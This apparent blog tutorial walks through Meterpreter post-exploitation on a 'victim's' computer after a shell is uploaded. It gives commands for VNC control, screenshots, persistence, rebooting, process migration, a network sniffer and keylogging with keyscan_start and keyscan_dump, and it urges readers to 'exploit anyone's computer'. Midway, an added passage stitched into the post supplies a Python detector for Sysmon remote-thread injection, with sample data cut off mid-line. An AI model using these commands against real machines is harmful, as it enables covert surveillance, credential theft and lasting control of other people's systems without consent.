All you have to do after uploading a shell is use several commands, and then you can control any computer remotely.
As you can see, I uploaded a shell.
After uploading the shell, you can use many different commands.
The very first command is “run vnc”; this command is used for installing VNC on the remote computer.
meterpreter> run vnc
If you want to see what the user is doing, you can also take a screenshot by using
“screenshot”.
meterpreter> screenshot
After using the command “screenshot”, this kind of screenshot will appear.
If you don’t want the victim to have to execute the injected .exe file again and again,
you can make the session on his machine persistent. After that, the file only needs to be executed once, and from then on it will work automatically.
We can use the following command for that:
meterpreter> run persistence -x
This command will make it persistent.
After making the victim’s machine persistent, we can check whether it is working or not. For that, just type
meterpreter> reboot
This will reboot the victim’s system remotely.
Meterpreter initially runs inside the exploited process or as its
own executable’s process in some cases. If that process is stopped for
any reason, the Meterpreter session will close, so it is good practice
to migrate the session to a more stable process such as Windows’
explorer.exe.
The following example shows the use of a handful of commands in
order to locate a process that the user will not close during his or her
session.
The commands are:
ps – Show a list of running processes.
getpid – Display the process Meterpreter is using, which shows an svchost.exe.
migrate pid – Move Meterpreter to a new process ID number, where we request the winlogon.exe process.
getpid – Display the new process Meterpreter is using, which we verify is the winlogon.exe process.
meterpreter> ps
It will give you a list of all the running processes.
Here you can see the process list.
To migrate to a process, type the command “migrate” followed by the process ID. For example, if we want to migrate to Internet Explorer, simply type the command
meterpreter> migrate 332
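From the defender's side, the migration described above can be caught when it is carried out by starting a thread inside another process, which Sysmon records as Event ID 8 (CreateRemoteThread). The following is an added example, not part of the original post: it flags such events when the target is winlogon.exe or explorer.exe. The sample events, the JSON-lines layout and the allowlist are constructed assumptions.

```python
import json
import ntpath

# Processes the post names as migration targets.
WATCHED_TARGETS = {"winlogon.exe", "explorer.exe"}
# Assumption: sources baselined in your environment as legitimate (lowercase paths).
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe"}

# Constructed sample data: Sysmon fields flattened to one JSON object per line.
SAMPLE_EVENTS = r"""
{"EventID": 8, "UtcTime": "2024-01-01 10:00:01.000", "SourceImage": "C:\\Windows\\System32\\svchost.exe", "SourceProcessId": 1052, "TargetImage": "C:\\Windows\\System32\\winlogon.exe", "TargetProcessId": 640}
{"EventID": 8, "UtcTime": "2024-01-01 10:00:05.000", "SourceImage": "C:\\Windows\\System32\\csrss.exe", "SourceProcessId": 512, "TargetImage": "C:\\Windows\\explorer.exe", "TargetProcessId": 2100}
{"EventID": 1, "UtcTime": "2024-01-01 10:00:09.000", "Image": "C:\\Windows\\explorer.exe", "ProcessId": 2100}
{"EventID": 8, "UtcTime": "2024-01-01 10:01:00.000", "SourceImage": "C:\\Users\\bob\\Downloads\\update.exe", "SourceProcessId": 4120, "TargetImage": "C:\\Windows\\explorer.exe", "TargetProcessId": 2100}
{"EventID": 8, "UtcTime": "2024-01-01 10:02:00.000", "SourceImage": "C:\\Tools\\debugger.exe", "SourceProcessId": 3000, "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 3100}
{"EventID": 8, "UtcTime": "2024-01-01 10:03:00.000", "SourceIm
"""


def find_suspicious_injections(lines):
    """Return one alert per remote thread created inside a watched process."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated or non-JSON line: skip it, keep processing
        if not isinstance(event, dict) or event.get("EventID") != 8:
            continue  # only CreateRemoteThread events are relevant here
        source = str(event.get("SourceImage", "")).lower()
        target = str(event.get("TargetImage", "")).lower()
        if ntpath.basename(target) not in WATCHED_TARGETS:
            continue
        if source in ALLOWED_SOURCES:
            continue
        alerts.append({"time": event.get("UtcTime"), "source": source,
                       "source_pid": event.get("SourceProcessId"),
                       "target": target, "target_pid": event.get("TargetProcessId")})
    return alerts


if __name__ == "__main__":
    for a in find_suspicious_injections(SAMPLE_EVENTS.splitlines()):
        print(f'{a["time"]} {a["source"]} ({a["source_pid"]}) -> {a["target"]} ({a["target_pid"]})')
```

The allowlist has to come from a baseline of your own hosts; some security and system software creates remote threads legitimately.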
One more command is for prefetching:
meterpreter> run prefetching -h
To find more commands for exploitation, we can use this command:
meterpreter> use -l
This will give us a list of all the main commands used for attacking.
From this list, we can use any command we want; all we have to do is use this small command:
meterpreter> use sniffer
This command will install a sniffer on the victim’s machine.
One more command is “keyscan_start”, which is used for installing a keylogger on the victim’s machine.
meterpreter> keyscan_start
Here you can see that I got into the victim’s computer and can see whatever I want from here. To go back to your meterpreter, just use the command written below:
C:\windows\system32>exit
If you want to see all the key logs, just use this command:
meterpreter> keyscan_dump
This will show us all the key presses line by line.
This is how we can use a lot of commands to exploit anyone’s computer, just give it a try!
Please comment if I have done well or if you have finished learning from the blog.